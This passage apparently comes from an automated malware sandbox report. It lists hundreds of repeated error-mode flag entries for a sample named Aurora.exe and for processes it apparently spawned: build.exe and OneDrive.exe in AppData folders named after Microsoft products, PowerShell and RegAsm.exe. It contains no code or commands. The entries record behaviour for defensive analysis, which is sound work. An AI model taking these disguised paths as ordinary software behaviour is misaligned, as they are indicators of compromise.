                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
